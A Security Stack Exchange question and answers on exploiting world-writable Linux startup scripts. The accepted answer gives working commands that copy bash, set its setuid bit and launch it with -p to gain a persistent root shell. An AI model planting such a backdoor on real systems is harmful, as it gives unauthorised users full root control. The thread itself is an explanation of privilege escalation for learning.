0

What are startup scripts in Linux and what are the steps to exploit startup scripts if they are world writable?

I would appreciate if one can explain based on the following two files as example in Ubuntu 16:

/etc/init.d/README
/etc/init.d/sudo
Anders
  • 64,406
  • 24
  • 178
  • 215
drdot
  • 559
  • 2
  • 6
  • 13
  • 2
    Instead of giving you the answer I will give you a few questions. What is the goal of an attacker on a system where he has restricted privileges? What does it mean for a script to run on startup (under what user does it run and context)? Combine these two answers and you know what an attacker might want to do and how he could do it. – Lucas Kauffman Feb 13 '17 at 03:09
  • @LucasKauffman, for other script I understand. Why are we running sudo and README during startup? – drdot Feb 13 '17 at 03:11
  • @LucasKauffman, I dont want to get a handwaving answer on least priviledge principle. I want to know exactly how to exploit them. – drdot Feb 13 '17 at 03:12
  • 2
    If a script is a collection of statements to be run subsequently and you would be able to write to this file, adding statements at the back. What statements could you add to gain a more privileged account? – Lucas Kauffman Feb 13 '17 at 03:21
  • @LucasKauffman, If as a regular user I can write to the start up scripts with are executed as root privilege. Then I can write it in a way that it runs my own shell command and/or run my malicious binary as root. Is this what you are indicating? – drdot Feb 13 '17 at 05:27
  • @LucasKauffman, but I dont see the setuid bit set for these binaries. So a user can overwrite it, only if the root runs it, then it will execute malicious stuff. However, is sudo and README being executed during boot? – drdot Feb 13 '17 at 05:29
  • 1
    I suggest you read up on your Linux folders and what they do. What is init.d used for? – Lucas Kauffman Feb 13 '17 at 10:59

1 Answers1

2

Arrange, to run as root:

cp $(which bash) $(which bash).muhaha
chmod u+s $(which bash).muhaha

Now, executing $(which bash).muhaha -p gives root to any user. You can even run a script as root with $(which bash).muhaha -p /path/to/script.

The -p option is necessary because otherwise bash detects that it is setuid and drops root privileges as a security measure.

DepressedDaniel
  • 1,240
  • 6
  • 8
  • Could you elaborate what is $(which bash) – drdot Feb 14 '17 at 03:35
  • `$(...)` runs a command and replaces the command output into the script. So `$(which bash)` stands for the output of the command `which bash`, which prints the path of `bash`. – DepressedDaniel Feb 14 '17 at 04:15
  • @dannycrane Basically, it makes the code more portable than assuming that `bash` is located at `/bin/bash`. – DepressedDaniel Feb 14 '17 at 04:30
  • So $(which bash) is the startup script that is world writable? Why would copying it to $(which base).muhaha and then give it execute permission make the muhaha script execute in root? – drdot Feb 14 '17 at 05:26
  • @dannycrane `chmod u+s` sets the `suid` bit https://en.wikipedia.org/wiki/Setuid. – DepressedDaniel Feb 14 '17 at 06:33